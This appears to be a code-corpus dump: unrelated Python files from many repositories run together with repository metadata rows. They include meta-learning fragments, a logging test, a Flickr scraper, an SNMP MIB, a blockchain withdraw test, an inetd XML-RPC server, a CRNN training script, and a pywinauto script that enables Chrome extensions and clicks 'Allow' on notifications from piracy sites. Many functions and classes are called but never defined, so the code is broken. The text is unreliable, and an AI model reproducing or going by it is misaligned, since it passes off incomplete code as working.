msg += str(len(params)) + ' vs ' + str(len(grads)) + ')'
print(msg)
for p, g in zip(params, grads):
if g is not None:
p.update = - lr * g
return update_module(model)
# Adapt the model #support loss
####new fake adopt 1
#####fake_adopt 3
#############fake adopt 4
#############fake adopt 5
#############fake adopt 6
#############fake adopt 7 ( )
# 50% + 50% fake
# 50 % client
# 50 % client fake
#fake7 : 1
# loss
# , =>
# ??
#############fake adopt 8 ( )
# 50% + 50% fake
# 50 % client
# 50 % client fake
##0812
#############fake adopt 9 ( )
# 50% + 50% fake
# 50 % client
# 50 % client fake
# + (support grad / query loss)
# + class
# fake7 : 1
# loss
# , =>
# ??
#############fake adopt 8 ( )
# 50% + 50% fake
# 50 % client
# 50 % client fake
### (FP 9,10 )
# CLIENT 32 DISJOINT .
# 16 # 16 .
| 34.855236 | 113 | 0.745353 |
c06a8301008200b139bb039c709d82f05d2164d7 | 1,602 | py | Python | sigda/test/graylog.py | yangluoshen/sigda | 83a2149d07edfbe56be95d5dc2a316c044bee54e | [
"BSD-2-Clause"
] | null | null | null | sigda/test/graylog.py | yangluoshen/sigda | 83a2149d07edfbe56be95d5dc2a316c044bee54e | [
"BSD-2-Clause"
] | 3 | 2017-08-21T07:26:11.000Z | 2017-11-09T02:19:23.000Z | sigda/test/graylog.py | yangluoshen/sigda | 83a2149d07edfbe56be95d5dc2a316c044bee54e | [
"BSD-2-Clause"
] | null | null | null | #coding:utf-8
#from graypy import GELFHandler
import logging.config
import logging
'''
handler = GELFHandler(host='0.0.0.0', port=12201)
logger = logging.getLogger()
logger.addHandler(handler)
logger.error('catch error')
'''
LOG_LEVEL = 'DEBUG'
LOG_CONFIG = get_log_config('sigda')
logging.config.dictConfig(LOG_CONFIG)
logging.error('catch error again2')
| 23.910448 | 92 | 0.473159 |
c06b4470ee6ba272de73e528bcb01060567707f9 | 142 | py | Python | instanotifier/fetcher/scripts/fetcher.py | chaudbak/instanotifier | d29bc6bd9b7a003403886bfff1376b2c1925cc74 | [
"MIT"
] | null | null | null | instanotifier/fetcher/scripts/fetcher.py | chaudbak/instanotifier | d29bc6bd9b7a003403886bfff1376b2c1925cc74 | [
"MIT"
] | 6 | 2020-06-06T01:27:17.000Z | 2022-02-10T11:20:17.000Z | instanotifier/fetcher/scripts/fetcher.py | chaudbak/instanotifier | d29bc6bd9b7a003403886bfff1376b2c1925cc74 | [
"MIT"
] | null | null | null | from instanotifier.fetcher import tests
| 20.285714 | 59 | 0.739437 |
c06b5a0da650cb5b7106dc53e3294c6abe96376c | 676 | py | Python | clase_4/populate_alumnos.py | noctilukkas/python-programming | 0ced5e1390e5501bae79fd30dd2baefd7bc09040 | [
"Apache-2.0"
] | null | null | null | clase_4/populate_alumnos.py | noctilukkas/python-programming | 0ced5e1390e5501bae79fd30dd2baefd7bc09040 | [
"Apache-2.0"
] | null | null | null | clase_4/populate_alumnos.py | noctilukkas/python-programming | 0ced5e1390e5501bae79fd30dd2baefd7bc09040 | [
"Apache-2.0"
] | null | null | null | import sqlite3
if __name__ == '__main__':
main()
| 22.533333 | 79 | 0.597633 |
fbe36d61bbb46c7d89d9f7a7b5921b3928eef150 | 366 | py | Python | cap11/main.py | felipesch92/livroPython | 061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307 | [
"MIT"
] | null | null | null | cap11/main.py | felipesch92/livroPython | 061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307 | [
"MIT"
] | null | null | null | cap11/main.py | felipesch92/livroPython | 061b1c095c3ec2d25fb1d5fdfbf9e9dbe10b3307 | [
"MIT"
] | null | null | null | import sqlite3
con = sqlite3.connect('agenda.db')
cursor = con.cursor()
cursor.execute('''
create table if not exists agenda(
nome text,
telefone text)
''')
cursor.execute('''
insert into agenda(nome, telefone)
values(?, ?)
''', ("Tamara", "51-98175-0510"))
con.commit()
cursor.close()
con.close()
| 22.875 | 42 | 0.562842 |
fbe380b10e29919d567688beee1e5f00654464f3 | 4,298 | py | Python | falconcv/data/scraper/flickr_scraper.py | haruiz/FalconCV | 0c9444451a60c8f6375c30426811160ae79b02ba | [
"Apache-2.0"
] | 16 | 2020-06-05T01:26:04.000Z | 2020-09-18T23:56:14.000Z | falconcv/data/scraper/flickr_scraper.py | haruiz/FalconCV | 0c9444451a60c8f6375c30426811160ae79b02ba | [
"Apache-2.0"
] | 13 | 2020-06-01T17:35:22.000Z | 2020-09-22T23:19:27.000Z | falconcv/data/scraper/flickr_scraper.py | haruiz/FalconCV | 0c9444451a60c8f6375c30426811160ae79b02ba | [
"Apache-2.0"
] | 2 | 2020-06-06T06:10:58.000Z | 2020-06-08T07:19:24.000Z | import logging
import math
import re
import time
import dask
import numpy as np
import requests
import json
import xml.etree.ElementTree as ET
from falconcv.data.scraper.scraper import ImagesScraper
from falconcv.util import ImageUtil
logger = logging.getLogger(__name__)
FLICKR_ENDPOINT = "https://www.flickr.com/services/rest"
# List of sizes:
# url_o: Original (4520 3229)
# url_k: Large 2048 (2048 1463)
# url_h: Large 1600 (1600 1143)
# url_l=: Large 1024 (1024 732)
# url_c: Medium 800 (800 572)
# url_z: Medium 640 (640 457)
# url_m: Medium 500 (500 357)
# url_n: Small 320 (320 229)
# url_s: Small 240 (240 171)
# url_t: Thumbnail (100 71)
# url_q: Square 150 (150 150)
# url_sq: Square 75 (75 75)
| 37.701754 | 90 | 0.543509 |
fbe3b3f30ddf6f664ac393236c6cc50652de4531 | 9,893 | py | Python | argparser.py | geoff-smith/MCplotscripts | 16dd5fd849671bb082a71f08492676be876209d3 | [
"MIT"
] | null | null | null | argparser.py | geoff-smith/MCplotscripts | 16dd5fd849671bb082a71f08492676be876209d3 | [
"MIT"
] | null | null | null | argparser.py | geoff-smith/MCplotscripts | 16dd5fd849671bb082a71f08492676be876209d3 | [
"MIT"
] | null | null | null | # argParser
# this class generates a RunParams object from the args passed to the script
from runparams import *
import os.path
import string
## handles args passed to the program
#
| 39.730924 | 153 | 0.574548 |
fbe4f5813f57f07bcd01eac89fa0f4bcc8abfeac | 1,326 | py | Python | floppy/_surf-garbage.py | hillscott/windows | ba32cd43db1bd1495f0150ab0c32ee63b5a5d415 | [
"Apache-2.0"
] | null | null | null | floppy/_surf-garbage.py | hillscott/windows | ba32cd43db1bd1495f0150ab0c32ee63b5a5d415 | [
"Apache-2.0"
] | null | null | null | floppy/_surf-garbage.py | hillscott/windows | ba32cd43db1bd1495f0150ab0c32ee63b5a5d415 | [
"Apache-2.0"
] | null | null | null | # pip install -U pywinauto
from pywinauto.application import Application
import subprocess
import time
subprocess.run('SCHTASKS /DELETE /TN BuildTasks\\Sites /f')
app = Application(backend='uia')
app.start('C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe --force-renderer-accessibility ')
window = app.top_window()
# Allow the registry installed extensions to load...
time.sleep(45)
ch_window = window.child_window(title="Address and search bar", control_type="Edit")
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}chrome://extensions/{ENTER}')
time.sleep(3)
# Enable Honey (or disable google drive offline)
dlg = window.button6
try:
dlg.click()
except Exception:
dlg.close()
# Enable Soccer wallpapers (or Soccer wallpapers)
dlg = window.button9
try:
dlg.click()
except Exception:
dlg.close()
# Enable Soccer wallpapers (if it exists)
dlg = window.button12
try:
dlg.click()
except Exception:
dlg.close()
time.sleep(5)
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}https://thepiratebay.org{ENTER}')
time.sleep(10)
# Allow notifications
dlg = window.AllowButton
try:
dlg.wait_not('visible', timeout=2)
dlg.click()
except Exception:
dlg.close()
ch_window.type_keys('^a')
ch_window.type_keys('{BACKSPACE}{BACKSPACE}https://yts.mx{ENTER}')
time.sleep(3)
window.close()
| 27.625 | 103 | 0.748115 |
fbe52989054e585791a8f893935e850e1910b673 | 992 | py | Python | sla/migrations/0005_slaprobe_workflow.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 84 | 2017-10-22T11:01:39.000Z | 2022-02-27T03:43:48.000Z | sla/migrations/0005_slaprobe_workflow.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 22 | 2017-12-11T07:21:56.000Z | 2021-09-23T02:53:50.000Z | sla/migrations/0005_slaprobe_workflow.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 23 | 2017-12-06T06:59:52.000Z | 2022-02-24T00:02:25.000Z | # ----------------------------------------------------------------------
# Migrate SLAProbe to workflow
# ----------------------------------------------------------------------
# Copyright (C) 2007-2021 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
from pymongo import UpdateMany
from bson import ObjectId
# NOC modules
from noc.core.migration.base import BaseMigration
| 31 | 90 | 0.484879 |
fbe699dad305df809951dcf85f4ec36f0f78ab23 | 2,640 | py | Python | seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py | guanjue/seqpos | ab9308ad128547ca968a1d944490710e583703bc | [
"MIT"
] | null | null | null | seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py | guanjue/seqpos | ab9308ad128547ca968a1d944490710e583703bc | [
"MIT"
] | null | null | null | seqpos/lib/python2.7/site-packages/mercurial/dirstateguard.py | guanjue/seqpos | ab9308ad128547ca968a1d944490710e583703bc | [
"MIT"
] | null | null | null | # dirstateguard.py - class to allow restoring dirstate after failure
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
from .i18n import _
from . import (
error,
narrowspec,
util,
)
| 34.736842 | 77 | 0.610227 |
fbe71debd90d8d660d1121d1807a3090d9eabd7b | 2,061 | py | Python | config.py | mF2C/UserManagement | 0a44f8fbf86a140156da2f87a25490345f296cbb | [
"Apache-2.0"
] | null | null | null | config.py | mF2C/UserManagement | 0a44f8fbf86a140156da2f87a25490345f296cbb | [
"Apache-2.0"
] | 12 | 2017-10-25T08:05:32.000Z | 2019-11-13T14:29:42.000Z | config.py | mF2C/UserManagement | 0a44f8fbf86a140156da2f87a25490345f296cbb | [
"Apache-2.0"
] | 1 | 2017-10-24T10:13:55.000Z | 2017-10-24T10:13:55.000Z | """
CONFIGURATION FILE
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Roi Sucasas Font, Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 18 oct. 2018
@author: Roi Sucasas - ATOS
"""
#!/usr/bin/python
dic = { "VERSION": "1.3.10",
# USER MANAGEMENT MODULE MODE: "DEFAULT", "MF2C" , "STANDALONE"
"UM_MODE": "MF2C",
# CIMI
"CIMI_URL": "http://cimi:8201/api",
"DEVICE_USER": "rsucasas",
# SERVER - REST API
"SERVER_PORT": 46300,
"HOST_IP": "localhost",
"API_DOC_URL": "/api/v2/um",
# working dir: "C://TMP/tmp/mf2c/um/" "/tmp/mf2c/um/"
"UM_WORKING_DIR_VOLUME": "/tmp/mf2c/um/",
# db
"DB_SHARING_MODEL": "dbt1",
"DB_USER_PROFILE": "dbt2",
# VERIFY_SSL controls whether we verify the server's TLS certificate or not
"VERIFY_SSL": False,
# for testing the interaction with the lifecycle management
"ENABLE_ASSESSMENT": True,
# CIMI RESOURCES managed by this component
"CIMI_PROFILES": "user-profile",
"CIMI_SHARING_MODELS": "sharing-model",
"SERVICE_CONSUMER": True,
"RESOURCE_CONTRIBUTOR": True,
"MAX_APPS": 2,
"BATTERY_LIMIT": 50,
"GPS_ALLOWED": True,
"MAX_CPU_USAGE": 50,
"MAX_MEM_USAGE": 50,
"MAX_STO_USAGE": 50,
"MAX_BANDWITH_USAGE": 50,
# URLs / ports from other components:
# LIFECYCLE
"URL_PM_LIFECYCLE": "http://lifecycle:46000/api/v2/lm"
}
# APPS RUNNING
APPS_RUNNING = 0 | 32.714286 | 109 | 0.501698 |
fbe8a390825becc2ff9eab5332457693f2473fbc | 3,606 | py | Python | pysnmp-with-texts/IANA-MALLOC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/IANA-MALLOC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/IANA-MALLOC-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module IANA-MALLOC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IANA-MALLOC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:50:25 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Integer32, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, NotificationType, TimeTicks, mib_2, ObjectIdentity, Bits, Counter64, Gauge32, Unsigned32, ModuleIdentity, Counter32, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "NotificationType", "TimeTicks", "mib-2", "ObjectIdentity", "Bits", "Counter64", "Gauge32", "Unsigned32", "ModuleIdentity", "Counter32", "IpAddress")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
ianaMallocMIB = ModuleIdentity((1, 3, 6, 1, 2, 1, 102))
ianaMallocMIB.setRevisions(('2014-05-22 00:00', '2003-01-27 12:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ianaMallocMIB.setRevisionsDescriptions(('Updated contact info.', 'Initial version.',))
if mibBuilder.loadTexts: ianaMallocMIB.setLastUpdated('201405220000Z')
if mibBuilder.loadTexts: ianaMallocMIB.setOrganization('IANA')
if mibBuilder.loadTexts: ianaMallocMIB.setContactInfo(' Internet Assigned Numbers Authority Internet Corporation for Assigned Names and Numbers 12025 Waterfront Drive, Suite 300 Los Angeles, CA 90094-2536 Phone: +1 310-301-5800 EMail: iana&iana.org')
if mibBuilder.loadTexts: ianaMallocMIB.setDescription('This MIB module defines the IANAscopeSource and IANAmallocRangeSource textual conventions for use in MIBs which need to identify ways of learning multicast scope and range information. Any additions or changes to the contents of this MIB module require either publication of an RFC, or Designated Expert Review as defined in the Guidelines for Writing IANA Considerations Section document. The Designated Expert will be selected by the IESG Area Director(s) of the Transport Area.')
mibBuilder.exportSymbols("IANA-MALLOC-MIB", IANAmallocRangeSource=IANAmallocRangeSource, IANAscopeSource=IANAscopeSource, ianaMallocMIB=ianaMallocMIB, PYSNMP_MODULE_ID=ianaMallocMIB)
| 100.166667 | 537 | 0.781475 |
fbe96376f6c7e8ea5a7177b454718260bda00d58 | 112 | py | Python | api/base/views/__init__.py | simpsonw/atmosphere | 3a5203ef0b563de3a0e8c8c8715df88186532d7a | [
"BSD-3-Clause"
] | 197 | 2016-12-08T02:33:32.000Z | 2022-03-23T14:27:47.000Z | api/base/views/__init__.py | simpsonw/atmosphere | 3a5203ef0b563de3a0e8c8c8715df88186532d7a | [
"BSD-3-Clause"
] | 385 | 2017-01-03T22:51:46.000Z | 2020-12-16T16:20:42.000Z | api/base/views/__init__.py | benlazarine/atmosphere | 38fad8e4002e510e8b4294f2bb5bc75e8e1817fa | [
"BSD-3-Clause"
] | 50 | 2016-12-08T08:32:25.000Z | 2021-12-10T00:21:39.000Z | from .version import VersionViewSet, DeployVersionViewSet
__all__ = ["VersionViewSet", "DeployVersionViewSet"]
| 28 | 57 | 0.821429 |
fbed4a160c462e80695d00929515e53d559a44ef | 455 | py | Python | amaranth/vendor/xilinx_spartan_3_6.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | [
"BSD-2-Clause"
] | 528 | 2020-01-28T18:21:00.000Z | 2021-12-09T06:27:51.000Z | amaranth/vendor/xilinx_spartan_3_6.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | [
"BSD-2-Clause"
] | 360 | 2020-01-28T18:34:30.000Z | 2021-12-10T08:03:32.000Z | amaranth/vendor/xilinx_spartan_3_6.py | psumesh/nmigen | 7d611b8fc1d9e58853ff268ec38ff8f4131a9774 | [
"BSD-2-Clause"
] | 100 | 2020-02-06T21:55:46.000Z | 2021-11-25T19:20:44.000Z | import warnings
from .xilinx import XilinxPlatform
__all__ = ["XilinxSpartan3APlatform", "XilinxSpartan6Platform"]
XilinxSpartan3APlatform = XilinxPlatform
XilinxSpartan6Platform = XilinxPlatform
# TODO(amaranth-0.4): remove
warnings.warn("instead of amaranth.vendor.xilinx_spartan_3_6.XilinxSpartan3APlatform and "
".XilinxSpartan6Platform, use amaranth.vendor.xilinx.XilinxPlatform",
DeprecationWarning, stacklevel=2)
| 26.764706 | 90 | 0.782418 |
fbee0d4e9115c00d9a52094547d27c43033ebffb | 2,968 | py | Python | spatialtis/_plotting/api/community_map.py | Mr-Milk/SpatialTis | bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6 | [
"Apache-2.0"
] | 10 | 2020-07-14T13:27:35.000Z | 2021-11-24T21:41:30.000Z | spatialtis/_plotting/api/community_map.py | Mr-Milk/SpatialTis | bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6 | [
"Apache-2.0"
] | 21 | 2021-01-10T09:39:25.000Z | 2022-03-12T01:04:52.000Z | spatialtis/_plotting/api/community_map.py | Mr-Milk/SpatialTis | bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6 | [
"Apache-2.0"
] | null | null | null | from ast import literal_eval
from collections import Counter
from typing import Dict, Optional
from anndata import AnnData
from spatialtis.config import Config, analysis_list
from ...utils import doc
from ..base import graph_position_interactive, graph_position_static
from .utils import query_df
| 31.242105 | 91 | 0.637466 |
fbef292579d80d2de80ed4ab24cb1a2133c269b6 | 7,209 | py | Python | pynics/binparse/castep_bin_results.py | ThatPerson/pynics | ae9dd58fa4353c4907f6fd7d6ad368029a4288f1 | [
"MIT"
] | 2 | 2019-10-03T21:18:17.000Z | 2019-10-05T13:08:36.000Z | pynics/binparse/castep_bin_results.py | ThatPerson/pynics | ae9dd58fa4353c4907f6fd7d6ad368029a4288f1 | [
"MIT"
] | 2 | 2021-06-25T15:11:27.000Z | 2021-10-04T13:23:04.000Z | pynics/binparse/castep_bin_results.py | ThatPerson/pynics | ae9dd58fa4353c4907f6fd7d6ad368029a4288f1 | [
"MIT"
] | 1 | 2021-06-25T14:32:07.000Z | 2021-06-25T14:32:07.000Z | # Python 2-to-3 compatibility code
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
from pynics.binparse.forbinfile import RecordError
# Utility routine
castep_bin_olist = {
'E_FERMI': opt_e_fermi_parse,
'OEP_POT': opt_oep_pot_parse,
'DE_DLOGE': opt_de_dloge_parse,
'FORCES': opt_forces_parse,
'STRESS': opt_stress_parse,
'SHIELDING': opt_shielding_parse,
'EFG': opt_efg_parse,
}
| 34.826087 | 78 | 0.629768 |
fbef307f38bef0fc49bdcc1050b0a7022b885117 | 1,084 | py | Python | epi-poc-demo/node-b/node-b.py | onnovalkering/epif-poc | 0fac10ce59037fbf8725f09808813dbab71ff70a | [
"Apache-2.0"
] | null | null | null | epi-poc-demo/node-b/node-b.py | onnovalkering/epif-poc | 0fac10ce59037fbf8725f09808813dbab71ff70a | [
"Apache-2.0"
] | null | null | null | epi-poc-demo/node-b/node-b.py | onnovalkering/epif-poc | 0fac10ce59037fbf8725f09808813dbab71ff70a | [
"Apache-2.0"
] | null | null | null | import os
import socket
import threading
HEADER = 64
PORT = 5053
FW = "192.168.101.2"
ADDR = (FW, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
print("[STARTING] server is starting...")
start()
| 23.565217 | 74 | 0.628229 |
fbef8b98b95a0bd508e97ef365acd9e2c1cbd2ce | 652 | py | Python | sliding_window/equal_substring.py | sleebapaul/codeforces | 50c8bff0b36e6ce7e8f89c7c827ae8845f80098e | [
"MIT"
] | null | null | null | sliding_window/equal_substring.py | sleebapaul/codeforces | 50c8bff0b36e6ce7e8f89c7c827ae8845f80098e | [
"MIT"
] | null | null | null | sliding_window/equal_substring.py | sleebapaul/codeforces | 50c8bff0b36e6ce7e8f89c7c827ae8845f80098e | [
"MIT"
] | null | null | null | """
1208. Get Equal Substrings Within Budget
Straight forward. Asked the max len, so count the max each time.
""" | 27.166667 | 72 | 0.518405 |
fbef9d38a58cfa2a1c22c680025cec376e6993bf | 13,836 | py | Python | test/functional/esperanza_withdraw.py | frolosofsky/unit-e | d3d12508b915986841bd19c4dee9e50dd662a112 | [
"MIT"
] | null | null | null | test/functional/esperanza_withdraw.py | frolosofsky/unit-e | d3d12508b915986841bd19c4dee9e50dd662a112 | [
"MIT"
] | null | null | null | test/functional/esperanza_withdraw.py | frolosofsky/unit-e | d3d12508b915986841bd19c4dee9e50dd662a112 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2018-2019 The Unit-e developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import UnitETestFramework
from test_framework.util import (
json,
connect_nodes,
disconnect_nodes,
assert_equal,
assert_finalizationstate,
assert_raises_rpc_error,
sync_blocks,
wait_until,
)
from decimal import Decimal
import time
LOGOUT_DYNASTY_DELAY = 3
WITHDRAW_EPOCH_DELAY = 12
if __name__ == '__main__':
EsperanzaWithdrawTest().main()
| 46.901695 | 113 | 0.568661 |
fbf016290a6953a4fa95305b7831cd89ba6cb242 | 2,213 | py | Python | test/geocoders/placefinder.py | gongso1st/geopy | 9252f4b12197ff3c5e3fae50d9bae74974d5d20f | [
"MIT"
] | 1 | 2019-07-17T14:38:52.000Z | 2019-07-17T14:38:52.000Z | test/geocoders/placefinder.py | gongso1st/geopy | 9252f4b12197ff3c5e3fae50d9bae74974d5d20f | [
"MIT"
] | null | null | null | test/geocoders/placefinder.py | gongso1st/geopy | 9252f4b12197ff3c5e3fae50d9bae74974d5d20f | [
"MIT"
] | 1 | 2021-06-28T01:20:12.000Z | 2021-06-28T01:20:12.000Z |
import unittest
from geopy.compat import u
from geopy.point import Point
from geopy.geocoders import YahooPlaceFinder
from test.geocoders.util import GeocoderTestBase, env
| 28.371795 | 87 | 0.598735 |
fbf1cd1a479f1f30a64fa316deccf90f2fde6080 | 1,151 | py | Python | inetdxmlrpc.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | inetdxmlrpc.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | inetdxmlrpc.py | Leonidas-from-XIV/sandbox | ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50 | [
"WTFPL"
] | null | null | null | #!/usr/bin/env python2.4
# -*- encoding: latin-1 -*-
"""A small XML-RPC Server running under control
of the internet superserver inetd.
Configuring:
Add this line to your inetd.conf
embedxmlrpc stream tcp nowait user /usr/sbin/tcpd inetdxmlrpc.py
Where user is the user to execute the script and
inetdxmlprc.py the path to the script.
and this line to your services.conf
embedxmlrpc 7373/tcp # standalone XML-RPC server
there 7373 will be the port
You have to restart your inetd.
"""
import sys, xmlrpclib
funcs = {"sumAndDifference": sumAndDifference}
if __name__ == '__main__':
inetdcall()
| 25.577778 | 77 | 0.645526 |
fbf23a32edea1c76b286e1eb5b7cddd3cfc77494 | 17,504 | py | Python | examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py | soar-zhengjian/uai-sdk | e195bd3fb2b97aca7dac6722d332c25b7070481f | [
"Apache-2.0"
] | 38 | 2017-04-26T04:00:09.000Z | 2022-02-10T02:51:05.000Z | examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py | soar-zhengjian/uai-sdk | e195bd3fb2b97aca7dac6722d332c25b7070481f | [
"Apache-2.0"
] | 17 | 2017-11-20T20:47:09.000Z | 2022-02-09T23:48:46.000Z | examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py | soar-zhengjian/uai-sdk | e195bd3fb2b97aca7dac6722d332c25b7070481f | [
"Apache-2.0"
] | 28 | 2017-07-08T05:23:13.000Z | 2020-08-18T03:12:27.000Z | """
Train shadow net script
"""
import argparse
import functools
import itertools
import os
import os.path as ops
import sys
import time
import numpy as np
import tensorflow as tf
import pprint
import shadownet
import six
from six.moves import xrange # pylint: disable=redefined-builtin
sys.path.append('/data/')
from crnn_model import crnn_model
from local_utils import data_utils, log_utils, tensorboard_vis_summary
from global_configuration import config
from uaitrain.arch.tensorflow import uflag
from typing import List
from tensorflow.core.framework import node_def_pb2
from tensorflow.python.framework import device as pydev
from tensorflow.python.training import device_setter
tf.app.flags.DEFINE_string('dataset_dir','/data/data/tfrecords','data path')
tf.app.flags.DEFINE_string('weights_path',None,'weight path')
FLAGS = tf.app.flags.FLAGS
logger = log_utils.init_logger()
def get_shadownet_fn(num_gpus, variable_strategy, num_workers):
"""Returns a function that will build shadownet model."""
return _shadownet_fun
def input_fn(data_dir,
subset,
num_shards,
batch_size,
use_distortion_for_training=True):
"""Create input graph for model.
Args:
data_dir: Directory where TFRecords representing the dataset are located.
subset: one of 'train', 'validate' and 'eval'.
num_shards: num of towers participating in data-parallel training.
batch_size: total batch size for training to be divided by the number of
shards.
use_distortion_for_training: True to use distortions.
Returns:
three
"""
with tf.device('/cpu:0'):
use_distortion = subset == 'train' and use_distortion_for_training
dataset = shadownet.ShadownetDataSet(data_dir, subset, use_distortion)
inputdata, input_labels = dataset.make_batch(batch_size)
if num_shards <= 1:
# No GPU available or only 1 GPU.
num_shards = 1
feature_shards = tf.split(inputdata, num_shards)
label_shards = tf.sparse_split(sp_input=input_labels, num_split=num_shards, axis=0)
return feature_shards, label_shards
if __name__ == '__main__':
# init args
# args = init_args()
#if not ops.exists(args.dataset_dir):
# raise ValueError('{:s} doesn\'t exist'.format(args.dataset_dir))
#train_shadownet(args.dataset_dir, args.weights_path)
# if args.weights_path is not None and 'two_stage' in args.weights_path:
# train_shadownet(args.dataset_dir, args.weights_path, restore_from_cnn_subnet_work=False)
# elif args.weights_path is not None and 'cnnsub' in args.weights_path:
# train_shadownet(args.dataset_dir, args.weights_path, restore_from_cnn_subnet_work=True)
# else:
# train_shadownet(args.dataset_dir)
parser = argparse.ArgumentParser()
parser.add_argument(
'--num_gpus',
type=int,
default=1,
help='UAI-SDK related. The number of gpus used.')
parser.add_argument(
'--log-device-placement',
action='store_true',
default=False,
help='Whether to log device placement.')
parser.add_argument(
'--num-intra-threads',
type=int,
default=0,
help="""\
Number of threads to use for intra-op parallelism. When training on CPU
set to 0 to have the system pick the appropriate number or alternatively
set it to the number of physical CPU cores.\
""")
parser.add_argument(
'--num-inter-threads',
type=int,
default=0,
help="""\
Number of threads to use for inter-op parallelism. If set to 0, the
system will pick an appropriate number.\
""")
parser.add_argument(
'--sync',
action='store_true',
default=False,
help="""\
If present when running in a distributed environment will run on sync mode.\
""")
parser.add_argument(
'--work_dir',
type=str,
default='/data/',
help='UAI SDK related.')
parser.add_argument(
'--data_dir',
type=str,
required=True,
help='UAI-SDK related. The directory where the CIFAR-10 input data is stored.')
parser.add_argument(
'--output_dir',
type=str,
required=True,
help='UAI-SDK related. The directory where the model will be stored.')
parser.add_argument(
'--log_dir',
type=str,
default='/data/data/',
help='UAI SDK related.')
parser.add_argument(
'--l_size',
type=int,
default=10,
help="""l_batch_label, how many labels CNN net work will output into LSTM""")
parser.add_argument(
'--learning_rate',
type=float,
default=0.1)
parser.add_argument(
'--decay_rate',
type=float,
default=0.1)
parser.add_argument(
'--decay_steps',
type=int,
default=40000)
parser.add_argument(
'--steps',
type=int,
default=200000)
parser.add_argument(
'--batch_size',
type=int,
default=512)
parser.add_argument(
'--tfrecord_dir',
type=str,
default='tfrecords')
args = parser.parse_args()
main(**vars(args))
print('Done') | 40.424942 | 159 | 0.584324 |
fbf29fa665c3f19650fb43d520ce03961090f743 | 7,007 | py | Python | ovs/extensions/hypervisor/hypervisors/vmware.py | mflu/openvstorage_centos | 280a98d3e5d212d58297e0ffcecd325dfecef0f8 | [
"Apache-2.0"
] | 1 | 2015-08-29T16:36:40.000Z | 2015-08-29T16:36:40.000Z | ovs/extensions/hypervisor/hypervisors/vmware.py | rootfs-analytics/openvstorage | 6184822340faea1d2927643330a7aaa781d92d36 | [
"Apache-2.0"
